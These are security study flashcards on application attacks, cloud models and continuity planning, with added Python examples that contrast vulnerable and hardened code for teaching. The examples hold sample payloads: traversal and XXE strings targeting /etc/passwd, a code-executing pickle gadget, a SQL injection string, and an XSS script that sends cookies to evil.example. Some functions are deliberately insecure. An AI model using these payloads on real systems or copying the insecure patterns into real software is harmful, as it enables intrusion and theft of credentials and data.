Chapters 11-14: Application/Cloud/Organizational security and Disaster planning Flashcards
Which application exploit accesses directories on the target machine that regular clients do not?
Directory traversal
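Added example (not from the flashcard set): how a traversal payload escapes the web root when a path is joined naively, and the canonicalise-then-check routine that stops it. The web root path, the sample requests and the helper names are assumptions chosen for illustration; a real handler would additionally call os.path.realpath() against a directory that exists.

```python
import posixpath
from urllib.parse import unquote

# Constructed example: the directory the application is allowed to serve from.
WEB_ROOT = "/srv/app/public"


def resolve_vulnerable(root: str, user_path: str) -> str:
    """Naive join followed by normalisation.

    '..' segments are applied after the join, so a relative path can climb
    out of root, and an absolute user_path makes posixpath.join discard the
    root entirely.
    """
    return posixpath.normpath(posixpath.join(root, user_path))


def resolve_safe(root: str, user_path: str) -> str:
    """Canonicalise, then require the result to stay under root.

    The check is done on normalised strings so the example runs without the
    files existing; real code should also realpath() the candidate so that
    symlinks inside the web root cannot point outside it.
    """
    # Decode once, as the web server would, so %2e%2e%2f is seen as ../
    decoded = unquote(user_path)
    if "\x00" in decoded:
        raise ValueError("NUL byte in path")
    # Drop leading slashes so an absolute path cannot replace root.
    candidate = posixpath.normpath(posixpath.join(root, decoded.lstrip("/")))
    root_norm = posixpath.normpath(root)
    if candidate != root_norm and not candidate.startswith(root_norm + "/"):
        raise PermissionError(f"path escapes web root: {user_path!r}")
    return candidate


def is_allowed(root: str, user_path: str) -> bool:
    try:
        resolve_safe(root, user_path)
        return True
    except (PermissionError, ValueError):
        return False


if __name__ == "__main__":
    for p in ["img/logo.png", "../../../etc/passwd", "/etc/passwd",
              "%2e%2e/%2e%2e/%2e%2e/etc/passwd"]:
        print(f"{p!r:45} vulnerable -> {resolve_vulnerable(WEB_ROOT, p)}")
        print(f"{'':45} safe       -> {'allowed' if is_allowed(WEB_ROOT, p) else 'rejected'}")
```

The prefix test uses `root + "/"` rather than `root` alone so that a sibling directory such as `/srv/app/public2` is not mistaken for a location inside the root.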
Which type of injection attack exploits a common XML parser feature? Attackers can use it to steal data or issue commands to other applications through an insecure parser.
XML External Entities (XXE)
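Added example (not part of the flashcards): a constructed XXE payload, an inspection pass that uses Python's expat parser to report DTD and external-entity declarations without fetching them, and a wrapper that refuses any document carrying a DTD before handing it to ElementTree. The payload, the benign document and the function names are assumptions for illustration.

```python
import xml.etree.ElementTree as ET
import xml.parsers.expat as expat

# Constructed payload: classic XXE that tries to read a local file.
XXE_PAYLOAD = b"""<?xml version="1.0"?>
<!DOCTYPE order [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<order><id>&xxe;</id></order>"""

# Constructed benign document of the same shape.
BENIGN = b"<order><id>42</id></order>"


class UnsafeXML(ValueError):
    pass


def inspect_xml(data: bytes) -> dict:
    """Walk the document with expat and report its DTD and entity declarations.

    expat reports declarations from the internal subset before expanding
    anything, so the external entity is seen without being resolved.
    """
    report = {"doctype": None, "external_entities": [], "parse_error": None}
    parser = expat.ParserCreate()
    # Never load parameter entities from an external DTD while inspecting.
    parser.SetParamEntityParsing(expat.XML_PARAM_ENTITY_PARSING_NEVER)

    def on_doctype(name, system_id, public_id, has_internal_subset):
        report["doctype"] = name

    def on_entity(name, is_param, value, base, system_id, public_id, notation):
        if system_id is not None or public_id is not None:
            report["external_entities"].append((name, system_id))

    parser.StartDoctypeDeclHandler = on_doctype
    parser.EntityDeclHandler = on_entity
    try:
        parser.Parse(data, True)
    except expat.ExpatError as exc:
        # Declarations recorded before the error still count.
        report["parse_error"] = str(exc)
    return report


def parse_untrusted(data: bytes) -> ET.Element:
    """Refuse any DTD at all (the usual hardening), then parse normally."""
    report = inspect_xml(data)
    if report["doctype"] is not None or report["external_entities"]:
        raise UnsafeXML(f"DTD or external entities not allowed: {report}")
    return ET.fromstring(data)


def is_safe(data: bytes) -> bool:
    try:
        parse_untrusted(data)
        return True
    except UnsafeXML:
        return False


if __name__ == "__main__":
    print(inspect_xml(XXE_PAYLOAD))
    print("payload safe?", is_safe(XXE_PAYLOAD), "benign safe?", is_safe(BENIGN))
```

Rejecting every DOCTYPE is deliberate: an allow-list of "harmless" entities is hard to get right, and parameter entities in an external DTD can smuggle the same attack past a check that only looks at general entities.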
Which type of attack runs attacker-supplied client-side script in other users' browsers by way of a web page? It allows the attacker to gain control of the end user's browser or login session.
Cross-site scripting (XSS)
Which type of attack occurs when data stored in a serialized format such as JSON is converted back into an object and used directly as program input? If the serialized data is under user control, it can be crafted to cause DoS, SQL injection, or remote code execution.
Insecure deserialization
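Added example (not from the flashcards): Python's pickle is a serialization format that can encode "call this function with these arguments", so loading attacker bytes runs attacker code. The block builds such a blob, shows it executing inside pickle.loads, and contrasts two defences: a restricted unpickler that allow-lists globals, and a data-only JSON format with strict shape validation. The marker function, schema and role names are assumptions for illustration.

```python
import io
import json
import pickle

# Constructed sink that records when attacker-chosen code runs.
SIDE_EFFECTS: list = []


def _attacker_payload(marker: str) -> str:
    """Stands in for os.system(...) in a real gadget chain."""
    SIDE_EFFECTS.append(marker)
    return marker


class Exploit:
    """pickle serialises an object as 'callable + args' via __reduce__.

    pickle.loads executes that call; the receiver never needs this class.
    """

    def __reduce__(self):
        return (_attacker_payload, ("code executed inside pickle.loads",))


def build_malicious_pickle() -> bytes:
    return pickle.dumps(Exploit())


def load_vulnerable(blob: bytes):
    # Untrusted bytes straight into pickle: attacker code runs here.
    return pickle.loads(blob)


class RestrictedUnpickler(pickle.Unpickler):
    """Allow-list the globals a stream may reference (pattern from the Python docs)."""
    ALLOWED = {("builtins", "dict"), ("builtins", "list"),
               ("builtins", "str"), ("builtins", "int")}

    def find_class(self, module, name):
        if (module, name) in self.ALLOWED:
            return super().find_class(module, name)
        raise pickle.UnpicklingError(f"global {module}.{name} is forbidden")


def load_restricted(blob: bytes):
    return RestrictedUnpickler(io.BytesIO(blob)).load()


def restricted_rejects(blob: bytes) -> bool:
    try:
        load_restricted(blob)
        return False
    except pickle.UnpicklingError:
        return True


# Constructed schema for the message the endpoint actually expects.
SCHEMA = {"user_id": int, "role": str}
ALLOWED_ROLES = {"viewer", "editor"}


def load_safe(blob: bytes) -> dict:
    """Data-only format plus strict shape validation; nothing can execute."""
    try:
        obj = json.loads(blob)
    except ValueError as exc:          # JSONDecodeError and UnicodeDecodeError
        raise ValueError(f"not valid JSON: {exc}") from None
    if not isinstance(obj, dict) or set(obj) != set(SCHEMA):
        raise ValueError("unexpected keys")
    for key, typ in SCHEMA.items():
        if type(obj[key]) is not typ:
            raise ValueError(f"{key} must be {typ.__name__}")
    if obj["role"] not in ALLOWED_ROLES:
        raise ValueError("role not allowed")
    return obj


def safe_rejects(blob: bytes) -> bool:
    try:
        load_safe(blob)
        return False
    except ValueError:
        return True


if __name__ == "__main__":
    blob = build_malicious_pickle()
    print("vulnerable:", load_vulnerable(blob), SIDE_EFFECTS)
    print("restricted rejects:", restricted_rejects(blob))
    print("safe:", load_safe(b'{"user_id": 7, "role": "viewer"}'))
```

The restricted unpickler still parses attacker-controlled structure, so it is a mitigation rather than a fix; the JSON path is the one to reach for when the data never needed to carry code.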
Which operation retrieves the object a pointer points to? Performing it on a null pointer can crash an application, bypass a security check, or leak useful debugging information.
Dereferencing
Which race-condition error occurs when something changes between the time you check a condition and the time you use the result of that check?
Time of check to time of use (TOCTOU)
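Added example (not from the flashcards): a TOCTOU race on the filesystem. The vulnerable reader checks a path with lstat and then opens the same path, leaving a window in which the file can be swapped for a symlink to a secret; the hardened reader opens first with O_NOFOLLOW and checks the descriptor it actually holds with fstat, so there is nothing to race. The attacker step is simulated with a callback so the outcome is deterministic; file names and contents are constructed, and the demo assumes a POSIX filesystem that supports symlinks.

```python
import os
import shutil
import stat
import tempfile


def read_public_vulnerable(path: str, attacker=None) -> bytes:
    """Check the path, then open the path: two lookups of the same name."""
    st = os.lstat(path)                                   # time of check
    if not stat.S_ISREG(st.st_mode):
        raise PermissionError("not a regular file")
    if attacker is not None:
        attacker()                                        # the race window
    with open(path, "rb") as f:                           # time of use
        return f.read()


def read_public_hardened(path: str) -> bytes:
    """Open first, then check the object actually opened: one lookup only."""
    fd = os.open(path, os.O_RDONLY | os.O_NOFOLLOW)      # refuses a symlink
    try:
        st = os.fstat(fd)                                 # check this fd, not the name
        if not stat.S_ISREG(st.st_mode):
            raise PermissionError("not a regular file")
        return os.read(fd, 1 << 16)
    finally:
        os.close(fd)


def run_demo() -> dict:
    """Constructed scenario: public.txt may be read, secret.txt must not be."""
    root = tempfile.mkdtemp()
    try:
        secret = os.path.join(root, "secret.txt")
        public = os.path.join(root, "public.txt")
        with open(secret, "wb") as f:
            f.write(b"TOP SECRET")
        with open(public, "wb") as f:
            f.write(b"hello world")

        def swap_for_symlink():
            # What the attacker does between the check and the use.
            os.remove(public)
            os.symlink(secret, public)

        before = read_public_hardened(public)
        stolen = read_public_vulnerable(public, attacker=swap_for_symlink)
        try:
            read_public_hardened(public)      # public.txt is now a symlink
            after = "opened"
        except OSError:
            after = "refused"
        return {"hardened_before_swap": before,
                "vulnerable_after_swap": stolen,
                "hardened_after_swap": after}
    finally:
        shutil.rmtree(root)


if __name__ == "__main__":
    print(run_demo())
```

The general rule the example illustrates: make the check and the use refer to the same kernel object (a file descriptor) rather than to a name that can be re-bound between the two calls.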
Which attack inserts code into a running process by forcing it to load executable code from a shared library file?
DLL injection
In which XSS technique is the script uploaded to the server?
Stored/Persistent
In which XSS technique is the script placed into a server request?
Reflected/Non-persistent
In which XSS technique is the script never placed on the server, but instead takes effect entirely in the model browsers use to render content?
Document Object Model (DOM) based
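Added example (not from the flashcards) of the server-side half of the stored and reflected cases: a stored comment and a reflected search term are rendered with and without output encoding, in two different HTML contexts. DOM-based XSS happens in client-side script and has no server-side rendering step to show here. The payloads, page fragments and function names are constructed for illustration.

```python
import html
from urllib.parse import parse_qs, urlencode

# Constructed stored payload: a "comment" the attacker saved to the database.
STORED_COMMENT = '<script>fetch("https://evil.example/?c=" + document.cookie)</script>'

# Constructed reflected payload: a search term that breaks out of value="".
REFLECTED_QUERY = urlencode({"q": '" autofocus onfocus="alert(document.cookie)'})


def render_comment_vulnerable(comment: str) -> str:
    # HTML-body context, comment inserted as-is: the <script> tag is live.
    return f'<div class="comment">{comment}</div>'


def render_comment_safe(comment: str) -> str:
    # Encode for the HTML-body context: < > & become entities, text stays text.
    return f'<div class="comment">{html.escape(comment, quote=True)}</div>'


def render_search_vulnerable(query_string: str) -> str:
    q = parse_qs(query_string).get("q", [""])[0]
    # Attribute context: an unescaped quote closes value="" and adds handlers.
    return f'<input name="q" value="{q}">'


def render_search_safe(query_string: str) -> str:
    q = parse_qs(query_string).get("q", [""])[0]
    # quote=True is what keeps the term inside the attribute value.
    return f'<input name="q" value="{html.escape(q, quote=True)}">'


if __name__ == "__main__":
    print(render_comment_vulnerable(STORED_COMMENT))
    print(render_comment_safe(STORED_COMMENT))
    print(render_search_vulnerable(REFLECTED_QUERY))
    print(render_search_safe(REFLECTED_QUERY))
```

Encoding has to match the context: html.escape is right for element bodies and quoted attributes, but a value placed inside a script block, a URL, or an unquoted attribute needs a different encoder, which is why template engines offer context-aware auto-escaping.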
Which attack exploits the site's trust in the user's browser, so that a request the user never intended is accepted because it carries their session?
Cross-site request forgery (CSRF or XSRF)
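Added example (not from the flashcards): the synchronizer-token defence against CSRF. The server stores an unguessable token in the session and embeds it in its own forms; a forged request from another site arrives with the victim's session cookie but cannot contain the token, and its Origin header gives it away as well. The origin set, the request shapes and the transfer endpoint are assumptions for illustration.

```python
import hmac
import secrets

# Constructed: the origins allowed to submit state-changing forms.
ALLOWED_ORIGINS = {"https://bank.example"}


def issue_csrf_token(session: dict) -> str:
    """Generate a per-session token and remember it server-side; the page
    embeds it in a hidden form field that only our own pages can read."""
    token = secrets.token_urlsafe(32)
    session["csrf_token"] = token
    return token


def origin_allowed(headers: dict) -> bool:
    """Browsers attach Origin (or at least Referer) to cross-site POSTs,
    so a request forged from evil.example carries the wrong one."""
    origin = headers.get("Origin")
    if origin is not None:
        return origin in ALLOWED_ORIGINS
    referer = headers.get("Referer")
    if referer is not None:
        return any(referer.startswith(o + "/") for o in ALLOWED_ORIGINS)
    return False   # neither header: treat as cross-site (conservative)


def check_csrf(session: dict, request: dict) -> bool:
    """Accept the POST only if the origin is ours AND the submitted token
    matches the one stored in this session."""
    if not origin_allowed(request["headers"]):
        return False
    expected = session.get("csrf_token")
    submitted = request["form"].get("csrf_token", "")
    if not expected or not submitted:
        return False
    return hmac.compare_digest(expected, submitted)   # constant-time compare


def transfer(session: dict, request: dict) -> str:
    """A state-changing endpoint; the session cookie alone is not enough."""
    if not check_csrf(session, request):
        return "rejected"
    return f"transferred {request['form']['amount']} to {request['form']['to']}"


if __name__ == "__main__":
    session = {"user": "alice"}
    token = issue_csrf_token(session)
    legit = {"headers": {"Origin": "https://bank.example"},
             "form": {"csrf_token": token, "to": "bob", "amount": "10"}}
    forged = {"headers": {"Origin": "https://evil.example"},
              "form": {"to": "mallory", "amount": "9999"}}
    print(transfer(session, legit), "/", transfer(session, forged))
```

Rejecting requests that carry neither Origin nor Referer is a policy choice: it is the safe default for browser-facing endpoints but will break non-browser clients, which should authenticate with a bearer token rather than a cookie in any case.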
Which attack is similar to CSRF but exploits a vulnerability in the server, tricking it into making requests (for example to internal systems) on the attacker's behalf?
Server side request forgery (SSRF)
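Added example (not from the flashcards): validating a user-supplied URL before the server fetches it, which is the core SSRF control. The scheme is restricted, userinfo tricks are refused, and the host is resolved and checked against loopback, private, link-local (including the cloud metadata address) and reserved ranges, with IPv4-mapped IPv6 handled. DNS answers are a constructed table so the block runs offline; the hostnames and addresses are assumptions for illustration.

```python
import ipaddress
from urllib.parse import urlsplit

# Constructed DNS answers so the example runs offline. Real code resolves
# with socket.getaddrinfo and must connect to the address it validated,
# otherwise a second lookup can return a different (internal) answer.
FAKE_DNS = {
    "api.partner.example": "93.184.216.34",
    "internal.corp.example": "10.0.0.5",
    "localhost": "127.0.0.1",
    "2130706433": "127.0.0.1",   # decimal 127.0.0.1, which inet_aton accepts
}


def fake_resolve(hostname: str) -> str:
    return FAKE_DNS.get(hostname, hostname)   # IP literals resolve to themselves


def is_forbidden_ip(ip: str) -> bool:
    addr = ipaddress.ip_address(ip)
    if addr.version == 6 and addr.ipv4_mapped is not None:
        return is_forbidden_ip(str(addr.ipv4_mapped))   # ::ffff:10.0.0.5
    return (addr.is_private or addr.is_loopback or addr.is_link_local
            or addr.is_multicast or addr.is_reserved or addr.is_unspecified)


def validate_fetch_target(url: str, resolve=fake_resolve) -> str:
    """Return the address the server may connect to, or raise ValueError."""
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https"):
        raise ValueError(f"scheme not allowed: {parts.scheme!r}")
    if parts.hostname is None:
        raise ValueError("no host in URL")
    if parts.username is not None or parts.password is not None:
        raise ValueError("userinfo in URL")       # http://trusted@10.0.0.5/
    ip = resolve(parts.hostname)
    if is_forbidden_ip(ip):
        raise ValueError(f"{parts.hostname} resolves to non-public address {ip}")
    return ip


def fetch_allowed(url: str) -> bool:
    try:
        validate_fetch_target(url)
        return True
    except ValueError:
        return False


if __name__ == "__main__":
    for u in ["https://api.partner.example/v1/report",
              "http://169.254.169.254/latest/meta-data/",
              "http://internal.corp.example/admin",
              "http://[::ffff:10.0.0.5]/",
              "http://api.partner.example@10.0.0.5/",
              "file:///etc/passwd",
              "http://2130706433/"]:
        print(f"{u:50} {'allowed' if fetch_allowed(u) else 'blocked'}")
```

Checking the resolved address rather than the hostname is what defeats decimal and octal IP spellings and attacker-controlled DNS names that point at internal space; redirects returned by the fetched server must be validated the same way.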
What technique prevents attacks such as injection and buffer overflows by validating all input received before it is processed?
Input validation
Which technique protects backend databases by adding escape characters so that input that resembles code is not treated as code?
Input Sanitization
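Added example (not from the flashcards) covering the two cards above against a SQL injection payload: an allow-list validator for the username, the quote-escaping sanitizer the card describes, and the parameterized query that makes escaping unnecessary. It runs against a constructed in-memory SQLite table; the table contents, regex and function names are assumptions for illustration.

```python
import re
import sqlite3

# Constructed allow-list: lowercase identifier, 3 to 32 characters.
USERNAME_RE = re.compile(r"[a-z][a-z0-9_]{2,31}")


def make_db() -> sqlite3.Connection:
    """Constructed in-memory user table."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (username TEXT, password_hash TEXT, role TEXT)")
    con.executemany("INSERT INTO users VALUES (?, ?, ?)",
                    [("alice", "h1", "admin"), ("bob", "h2", "user")])
    return con


def validate_username(username: str) -> str:
    """Input validation: accept only the expected shape, reject everything else."""
    if not USERNAME_RE.fullmatch(username):
        raise ValueError(f"invalid username: {username!r}")
    return username


def username_is_valid(username: str) -> bool:
    try:
        validate_username(username)
        return True
    except ValueError:
        return False


def escape_sql_literal(value: str) -> str:
    """Input sanitization as the card describes: escape the quote so it is
    data rather than code. Correct only for a single-quoted SQL literal."""
    return value.replace("'", "''")


def find_user_vulnerable(con, username: str):
    # String-built query: the attacker's quote ends the literal early.
    sql = f"SELECT username, role FROM users WHERE username = '{username}'"
    return con.execute(sql).fetchall()


def find_user_sanitized(con, username: str):
    sql = ("SELECT username, role FROM users WHERE username = "
           f"'{escape_sql_literal(username)}'")
    return con.execute(sql).fetchall()


def find_user_parameterized(con, username: str):
    # Preferred: the driver sends the value separately from the SQL text.
    return con.execute("SELECT username, role FROM users WHERE username = ?",
                       (username,)).fetchall()


if __name__ == "__main__":
    con = make_db()
    payload = "x' OR '1'='1"
    print("vulnerable   :", find_user_vulnerable(con, payload))
    print("sanitized    :", find_user_sanitized(con, payload))
    print("parameterized:", find_user_parameterized(con, payload))
    print("valid input? :", username_is_valid(payload))
```

Escaping works only for the exact context it was written for (here a single-quoted string literal); a value interpolated into a numeric comparison, an identifier, or a LIKE pattern needs different handling, which is why parameterized queries are the default and validation is the layer in front of them.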
Which cloud service model provides subscription-based access to applications or databases, sometimes referred to as "on-demand software"?
Software as a Service (SaaS)
Which cloud service model provides access to a computing platform or software environment that the cloud customer (CC) can use to develop and host web-based applications?
Platform as a Service (PaaS)
Which cloud service model provides access to computing and networking resources themselves, such as storage devices, processing, entire computers, and even whole networks?
Infrastructure as a Service (IaaS)
Which cloud service model includes storage as a service, information as a service, security as a service and so on?
Anything as a Service (XaaS)
In which cloud deployment model is access to the service available to the general public, for free or for a fee? It can be owned and hosted by any sort of public or private organization.
Public
In which cloud deployment model is the service accessible only to a single organization, though it is shared among multiple divisions or business units? It might be on-premises or off, and it might be owned and managed by the organization itself or by a third party.
Private
In which cloud deployment model is the service shared between a group of organizations with common concerns and needs, for example an organizational mission or specific technical, policy, or security requirements? It may be hosted by one of them, by a third party, or as a cooperative venture.
Community
In which cloud deployment model does the service have some combination of public, private, and community cloud characteristics under one shared hardware or software infrastructure? For example, a provider of public cloud services might also host private clouds for large customers with higher security needs or other specialized requirements.
Hybrid
Which cloud technology virtually segments and isolates a specific customer's cloud within a larger public cloud, so that one customer cannot affect another?
Virtual Private Cloud (VPC)
What is a server on the local network that can perform data standardization, reduction, and preliminary analysis? In cloud computing, data is passed to this entity after a collection point.
Fog node (Fog computing)
What is similar to a fog node but performs processing directly on the source devices, which form a peer-to-peer network?
Edge devices (Edge computing)
Sender Policy Framework (SPF), DomainKeys Identified Mail (DKIM) and Domain-based Message Authentication, Reporting and Conformance (DMARC) are examples of what?
Email security controls that help identify messages which may be forged
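Added example (not from the flashcards) of how the three controls fit together on the receiving side: a minimal SPF evaluator for ip4/ip6/all mechanisms, a DMARC record parser, and the alignment logic that decides whether an SPF or DKIM pass actually covers the visible From domain. The DNS records and the organizational-domain rule are constructed simplifications (real DMARC uses the Public Suffix List, and real SPF follows include:, a: and mx: via DNS); domain names and function names are assumptions for illustration.

```python
import ipaddress

# Constructed TXT records for the protected domain.
BANK_SPF = "v=spf1 ip4:203.0.113.0/24 ip6:2001:db8:10::/48 -all"
BANK_DMARC = "v=DMARC1; p=reject; adkim=s; aspf=r; rua=mailto:dmarc@bank.example"


def parse_tags(record: str) -> dict:
    """Split a 'k=v; k=v' TXT record (the layout DMARC uses)."""
    tags = {}
    for part in record.split(";"):
        if "=" in part:
            key, value = part.split("=", 1)
            tags[key.strip().lower()] = value.strip()
    return tags


def spf_check(spf_record: str, sender_ip: str) -> str:
    """Minimal SPF: ip4/ip6/all with qualifiers. include:, a:, mx: need DNS
    and are skipped here (simplification); a real evaluator follows them."""
    terms = spf_record.split()
    if not terms or terms[0].lower() != "v=spf1":
        return "none"
    ip = ipaddress.ip_address(sender_ip)
    results = {"+": "pass", "-": "fail", "~": "softfail", "?": "neutral"}
    for term in terms[1:]:
        qualifier = "+"
        if term[0] in results:
            qualifier, term = term[0], term[1:]
        mech, _, arg = term.partition(":")
        mech = mech.lower()
        if mech in ("ip4", "ip6"):
            if ip in ipaddress.ip_network(arg, strict=False):
                return results[qualifier]
        elif mech == "all":
            return results[qualifier]
    return "neutral"


def org_domain(domain: str) -> str:
    # Simplification: last two labels. Real DMARC consults the Public Suffix List.
    return ".".join(domain.lower().rstrip(".").split(".")[-2:])


def aligned(header_from: str, auth_domain: str, mode: str) -> bool:
    """Strict ('s') needs an exact match; relaxed ('r') the same org domain."""
    if mode == "s":
        return header_from.lower() == auth_domain.lower()
    return org_domain(header_from) == org_domain(auth_domain)


def dmarc_disposition(dmarc_record: str, header_from: str,
                      spf_domain, spf_result: str,
                      dkim_domain, dkim_result: str) -> str:
    """'pass' if an aligned SPF or DKIM pass exists, else the record's p= policy."""
    tags = parse_tags(dmarc_record)
    if tags.get("v") != "DMARC1" or "p" not in tags:
        return "none"
    spf_ok = bool(spf_result == "pass" and spf_domain
                  and aligned(header_from, spf_domain, tags.get("aspf", "r")))
    dkim_ok = bool(dkim_result == "pass" and dkim_domain
                   and aligned(header_from, dkim_domain, tags.get("adkim", "s" if False else "r")))
    if spf_ok or dkim_ok:
        return "pass"
    return tags["p"]   # none | quarantine | reject


if __name__ == "__main__":
    # Forged mail: From: bank.example, but sent from attacker.example's own server.
    spf = spf_check("v=spf1 ip4:198.51.100.0/24 -all", "198.51.100.9")   # passes for attacker.example
    print("forged   :", dmarc_disposition(BANK_DMARC, "bank.example",
                                          "attacker.example", spf, None, "none"))
    # Legitimate mail from the bank's relay, SPF-aligned under relaxed mode.
    spf = spf_check(BANK_SPF, "203.0.113.7")
    print("legit    :", dmarc_disposition(BANK_DMARC, "bank.example",
                                          "mail.bank.example", spf, None, "none"))
```

The forged message passes SPF (the attacker's own domain is allowed to send from that IP) but fails DMARC, because SPF authenticated the envelope domain and not the From domain the user sees; that alignment check is the whole point of layering DMARC over SPF and DKIM.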
What is a less formal business agreement that states the parties' mutual goals?
Memorandum of Understanding (MOU)
What is a security-focused business agreement that specifies the technical requirements for creating and maintaining a secure connection between the parties?
Interconnection Security Agreement (ISA)
What is a written agreement defining the general relationship between business partners? At a minimum, it defines how each organization shares profits, losses, property, and liability.
Business Partnership Agreement (BPA)
What is a formal definition of a service provided to or by the organization, typically including expectations for performance, reliability, and other service metrics?
Service-level agreement (SLA)
What is an attack that only applies when modems are in use, and that performs mechanized scanning of a range of telephone numbers looking for ones that answer?
War dialing
What is a metallic enclosure that prevents the entry or escape of an electromagnetic (EM) field?
Faraday cage
What is a document that includes an analysis of risks to business operations, the controls to mitigate them, and the procedures for maintaining or restoring service in the event of a disaster?
Business Continuity Plan (BCP)
What document identifies critical business functions and how long the business can operate without them?
Business Impact Analysis (BIA)
What document is a risk assessment specific to a single site or facility?
Site risk assessment
What document contains technical procedures for restoring services and operations after a significant disruption?
Disaster Recovery Plan (DRP)
Which document contains procedures for restoring individual information systems after a disaster?
Information system contingency plan (ISCP)
Which document contains procedures for moving critical operations to a temporary site?
Continuity of operations plan (COOP)
What document contains procedures for communications in the event of a disaster?
Crisis Communications Plan
What document contains procedures for managing sudden changes in personnel?
Succession Plan
What are the 5 steps in creating a BIA?
- Identify mission essential functions (MEFs)
- Identify systems, resources or even other functions used by each critical function
- Prioritize critical functions according to maximum tolerable downtime (MTD)
- Identify threats
- Determine mitigation techniques for each threat
Which recovery objective is the maximum expected amount of downtime?
Recovery Time Objective (RTO)
Which recovery objective is the maximum acceptable period of data loss in the event of a disaster, measured back from the point of failure?
Recovery Point Objective (RPO)
What redundancy strategy refers to connections allowing multiple paths between two points, so that an interruption to one path won't interrupt service?
Multipathing
What redundancy strategy is a form of link aggregation that joins multiple NICs on one host to the same network while presenting them as a single virtual adapter with a shared address?
NIC Teaming
Which technology resembles SIEM in that it automates the collection and analysis of security data, but whose goal is to streamline and standardize incident response workflows?
Security Orchestration, Automation, and Response (SOAR)
What is a set of conditional steps that must be performed as part of a security process, such as a log review?
Runbook
What is a looser workflow or checklist used to organize or document a security response process?
Playbook
The goal of which process is to keep an incident from escalating and to minimize its operational impact on the organization?
Containment
Once you know you won't lose or destroy valuable evidence, you can move on to the next step: eliminating the root cause of the problem and repairing any affected systems. What is this process?
Eradication
What is a notification sent from an organization’s legal team to employees instructing them not to delete electronically stored information (ESI) or discard paper documents that may be relevant to a new or imminent legal case?
Legal hold
What are the 5 steps of eDiscovery?
- Determine what data needs to be collected
- Include any information placed on a legal hold
- Secure physical and remote access to any systems or data relevant to the investigation
- Document the scene as you found it
- Secure the confidentiality, integrity and authenticity of your findings
Which cloud model is represented as a pay-per-use model?
SaaS
This is a form of malicious link that prepends a special data string before the URL to hide the nature of a false login site. For example, such a link might open a fake login page for your bank while bypassing the browser security features that would otherwise warn you in the address bar.
Prepending
These are messages containing links or other content designed to steal user information. The archetypal example links to a facsimile of a secure website such as a bank's; when victims attempt to log in, the attacker captures their username and password.
Credential Harvesting
This is spam sent by instant message
SPIM
This is spam sent over VoIP
SPIT